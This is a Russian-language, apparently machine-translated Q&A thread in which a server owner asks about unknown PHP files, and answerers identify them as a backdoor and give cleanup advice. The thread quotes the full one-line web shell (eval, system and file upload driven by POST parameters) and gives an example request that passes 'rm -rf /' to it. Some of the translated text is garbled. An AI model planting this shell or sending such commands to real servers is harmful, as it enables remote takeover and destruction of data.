Я недавно нашел 4 причудливых файла на своем сервере (что я не загружал). Имя файла было похоже на это: goog1e7a20543b128921.php
И вот код, который был в них:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
Сделайте у Вас есть любая идея, что этот код, как предполагается, делает..? Если я начинаю паниковать..?
Спасибо.
Ага, это вредоносный код. Этот сценарий оболочки позволит выполнить код, а также загрузить любой файл, если злоумышленник знает переданные ему параметры. Я рекомендую поискать этот код во всех файлах, проверить права доступа к файлу и на всякий случай сменить пароли.
Я бы посоветовал вам использовать HTML Purifier или OWASP , чтобы сделать вещи более безопасными.
Вы должны отключить конструкцию eval
, если вы ее не используете (и не должны этого делать, если вам это действительно не нужно).
Проанализируйте настройки сервера на наличие дыр в безопасности с помощью:
(источник: phpsec.org )
Для справки:
if($e){eval($e);}
Это позволяет злоумышленнику выполнить любую команду PHP, которую он хочет.
if($s){system($s);}
Это позволяет злоумышленнику выполнять любую системную команду, которую он хочет, в качестве любого пользователя, от имени которого работает ваш веб-сервер.
if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}
Это позволяет злоумышленнику загружать любой файл, который он хочет - опять же, права доступа к файлу определяет пользователь вашего веб-сервера.
Итак, panic :-p
Я уверен, что в Интернете есть много статей о том, как с этим бороться. Короче говоря, сделайте резервную копию своей системы для анализа позже, переустановите сервер с нуля (вы не знаете, что еще они сделали с вами, поэтому простого удаления файлов недостаточно.), Пытаясь понять, как они попали и затыкание дыры.
Это бэкдор на ваш веб-сервер.
Он позволяет злоумышленникам отправить запрос на http://you.com/goog1e7a20543b128921.php?s=rm -rf /
на удаление всей вашей системы.
Затем вам следует провести тщательную проверку безопасности вашего сайта, чтобы выяснить, как они вообще туда попали.
eval ($ e) - команда удаленного выполнения система - экв. для каталога listind $ _FILES ['f'] ['name'] - для скрипта загрузки в серверные средства взлома эквалайзера и т. Д.
Связано: Попробуйте установить phpAntiVirus на будущее, и попросите провайдера установить mod_security. Это может смягчить будущие взломы. Эти файлы в любом случае не материализовались сами по себе на вашем сервере. Избавьтесь от всех старых PHP-приложений.
по-видимому, не только у вас есть это. погуглил очень быстро, другие сайты тоже кажутся зараженными. похоже, что зараженный файл все время сохраняется в папке изображений.
Ищите это в каждом файле. Если вы обнаружите его с помощью вашего ftp, посмотрите дату изменения файла и откройте все измененные файлы. в эту дату и удалить его.